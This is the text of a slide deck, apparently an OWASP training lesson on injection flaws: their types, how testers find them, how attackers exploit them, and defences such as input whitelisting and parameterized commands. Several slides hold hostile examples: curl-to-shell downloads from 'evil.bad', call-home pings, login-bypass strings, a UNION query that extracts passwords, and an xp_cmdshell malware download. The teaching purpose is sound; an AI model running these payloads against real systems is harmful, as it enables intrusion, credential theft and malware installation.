Injection is the number 1 attack category in the OWASP Top 10 and for good reason: injection flaws are extremely damaging because they allow an attacker to execute arbitrary commands, either on on the host running the application or on the database server. This Application Security Lesson will teach you what is Injection, types of Injection, explain how to find it, how to exploit it and how to prevent it.

1. INJECTION
OWASP Top 10 Deep Dives

2. About Me

3. Injection the Biggest Hit
• Injection placed
at the top of
OWASP Top 10
since 2010

4. Injection the Biggest Hit
• Injection at the top of
MITRE Top 25

5. Injection Making Headlines

6. Many Types of Injection
• SQL Injection - Ability to insert arbitrary SQL
commands in database queries
• NoSQL Injection – Ability to insert arbitrary
commands in a NoSQL DB query
• OS Command Injection – Ability to insert
arbitrary commands in shell calls
• LDAP Injection – Ability to alter the logic of
an LDAP Query
• XPath Injection – Ability to alter the logic of
an XPath search
• MORE: MX, ORM, OGNL,
• RELATED: JSON, XML, HTML?, HTTP
HEADER?

7. LET'S PLAY,
WHAT TYPE OF
INJECTION IS IT?

8. SELECT * FROM users
WHERE name='admin' and
password='' or '1'='1';

9. Answer: SQL Injection

10. /bin/sh –c '~/backup.sh
test`curl
http://evil.bad/cc.sh|
/bin/sh`.zip'

11. Answer: OS Command
Injection

12. db.myCollection.find( {
active: true, $where:
'1=1');

13. Answer: NoSQL Injection

14. To sum all it up…
•Injection is the ability to insert arbitrary
commands into a string passed to a command
processor
•The type of injection takes the name of the
affected command processor: SQL, OS
Command, LDAP etc.
•SQL and OS Command the most widely exploited

16. CONCATENATION
… causes Injection!
COMMAND + INPUT = INJECTION

17. STRING REPLACEMENT

18. LET'S PLAY,
SPOT THE
INJECTION!

20. Answer: Both

22. Answer: Bottom

24. Answer: Top

25. To sum all it up…
•Recipe for Injection: Hazardous input
concatenated into a query or command
string
•command + input = injection
•replace(command, placeholder, input) =
injection
•format(command, input) = injection

26. Searching for Injection

27. 'single ', "double", `back quote`

28. SELECT * FROM users WHERE
name='''
/bin/sh –c '~/backup.sh
test".zip'

30. Blind Injection
• Error is not displayed or
the error message is too
generic
"An internal error
has occurred"
• You may observe a
difference in the behavior
of the application

31. Error vs. No Error
• The application will show an "Internal Error" for a unenclosed quote "
• There will be no error if an enclosing quote is added, two quotes ""
$ /bin/sh -c '~/backup.sh test".zip'
/bin/sh: -c: line 0: unexpected EOF while looking for
matching `"'
/bin/sh: -c: line 1: syntax error: unexpected end of
file
$ /bin/sh -c '~/backup.sh test"".zip'
yay

32. Tautology
• Influence the logic of a query to be
always true or always false then
compare the outcome
SELECT * FROM users WHERE
id = 1 --returns one record
id = 1 or 1=1 --returns all
records (always true)
id = 1 and 2=1 --returns no
records (always false)

33. The ET Maneuver
• Especially in the case of OS injection you
could add commands that "call home"
• Some examples:
input';ping home.bad -c 1;echo '
input';curl home.bad; echo '

34. Burp Collaborator gives you a home
• Pro version of Burp creates dynamic
host names and reports on DNS
queries and HTTP requests
• Be careful what you send there
$ /bin/sh -c '~/backup.sh
test`curl
nofq92nxlhqs01t4rgwz5j84bvhl5a.bur
pcollaborator.net`.zip'
% Total % Received %
Xferd Average

35. Glass Box
Stacktrace:] with root cause
ERROR 42X01: Syntax error: Encountered
"'" at line 1, column 49.
at
org.apache.derby.iapi.error.StandardExce
ption.newException(Unknown Source)
at
org.apache.derby.iapi.error.StandardExce
ption.newException(Unknown Source)
at
org.apache.derby.impl.sql.compile.Parser
Impl.parseStatementOrSearchCondition(Unk
nown Source)
at
org.apache.derby.impl.sql.compile.Parser
Impl.parseStatement(Unknown Source)
at
org.apache.derby.impl.sql.GenericStateme
nt.prepMinion(Unknown Source)
• Access to the
application or server
logs (you're a developer
or tester)
• Tail the log and observe
the errors that occur
when inserting quotes

36. Other symbols
•LDAP Injection : ( ) | &
•NoSQL Injection: , $where { } ( )
•SQL Injection: ; =
•Command Injection: ; & | $ ( )

37. Using Automated Tools
Dynamic Analysis tools
• numerous payloads
intended to influence
application behavior
• OWASP ZAP
Static Analysis tools
• analyze the call graph in
the application code to
determine insecure
coding

38. To sum all it up…
•Unenclosed quotes break the
command/query
•Look for errors
•Look for behavior changes
•Call home
•Look for errors in logs
•Use automated tools such as OWASP ZAP

39. How to
exploit
Injection?

40. The Magic Credentials
•User names that get you logged into the
administrator account:
•admin'--
•admin' or '1'='1
• ' or '1'='1

41. The UNION keyword
In the case of SQL Injection the
UNION command is used to append
results from a sensitive table to the
impacted query.
SELECT articleId,
title, description
FROM transactions
WHERE userId=15125
UNION SELECT 1,
username, password
FROM users
articleId title description
2 "About Us" "This is the
about page"
3 "Home" "This is the
home page"
1 admin @dm!n
1 jdoe p@$$w0rd

42. Deploy Malware
Command Injection, but also SQL Injection are used to deploy
malware and reverse shells
• ping host.local`curl
http://evil.bad/malware.sh|/bin/sh`
• SELECT * FROM users; EXEC xp_cmdshell
'powershell -command Invoke-RestMethod -
Uri http://evil.bad/malware>malware.bat'

43. To sum all it up…
•Injection can be exploited in powerful
ways
•Break authentication
•Exfiltrate data
•Install reverse shells and malware
•Full impact of Confidentiality, Integrity and
Availability

44. DEMO

45. DEFENDING AGAINST INJECTION

47. Quotes Not Needed
• Majority of application
parameters are not intended
to contain quotes
• Many of them are not even
intended to contain Unicode
characters
• Parameters going into
database queries such as ID,
true/false, asc/desc have even
a smaller character set
Alphanumeric
Alphanumeric + .-_

48. Whitelisting vs. Blacklisting
•Blacklisting can be bypassed
• Encoding attacks
• Forgotten types of quotes
• Injection without quotes
• Remember the how many times
Shellshock was fixed?

50. Unicode Validation
• One of the common misconceptions against whitelisting:
multi-language support
• Most programming languages even regular expressions (p)
will classify other language characters correctly
Character.isLetter("人") == true
Character.isLetter("û") == true

51. Input Validation Example

52. A Simple Multi-Purpose Function
isAlphanumOrEx("true")
isAlphanumOrEx("desc")
isAlphanumOrEx("21845816438168")
isAlphanumOrEx("0x0709750fa566")
isAlphanumOrEx("Cr2i7nHq6qiMEs")
isAlphanumOrEx("site.local",'.')

53. The Proper Response to an Injection Attack
• Error conditions can be used to detect injection but this error is
what you always want to see in response to hazardous characters
BAD REQUEST:
INVALID INPUT - MUST BE ALPHANUMERIC

54. Amount of vulnerabilities
inversely proportional with
amount of Input Whitelisting

55. Attacks Prevented by Whitelisting
•Injection
•Path Traversal
•Cross-Site Scripting
•Open Redirect
•Deserialization
…

56. How About the Irish?
•Names, comments, articles, free text require
quotes:
•O'Brien, don't, "putting things in quotes"
•While input whitelisting reduces the attack
surface, it cannot prevent all attacks

57. CONCATENATION
Command Constant
Parameter 1 Input
Parameter 2 Input
Command
Interpreter

58. LET'S PLAY,
WHAT DEFENSE
IS IT!

60. Answer: Parameterized
Command

62. Answer: Parameterized
Command

64. Answer: Input
Whitelisting &
Parameterized Command

65. ORM Frameworks
• ORM = Object Relational Mapping
• ORM Frameworks keep developers away from SQL Queries
• Popular ORM Framework: Hibernate
Command Constant
Parameter 1 Input
Parameter 2 Input
Command
Interpreter
Object
Field1 Input
Field2 Input

66. OWASP ESAPI
• ESAPI – The Enterprise Security API
• Open Source Library containing
security controls
• Written and tested by application
security experts
• Recognized by static analysis tools

67. Using Automated Tools
Intrusion Detection and Prevention (IDS/IPS) / Web
Application Firewall (WAS)
• automated blacklisting rules
• can be bypassed
• can alert
Runtime Analysis (RASP)
• instrument the application
• can detect the exploit and block it

68. To sum all it up…
•Input Whitelisting reduces the attack surface and
prevents many attack types
•Parameterized Commands handle situations where
hazardous chars are needed
•ORM Frameworks prevent mistakes
•OWASP ESAPI provides a set of handy security
functions
•IDS/IPS/WAF/RASP can alert and prevent some of the
attacks but not a replacement for secure coding.

69. Test Your Knowledge and get a Badge
• https://owasp.trendmicro.com
• SQL Injection Challenge
•Play code: In' or '1'='1' or 'jection
• Get a participation badge via
Badgr.io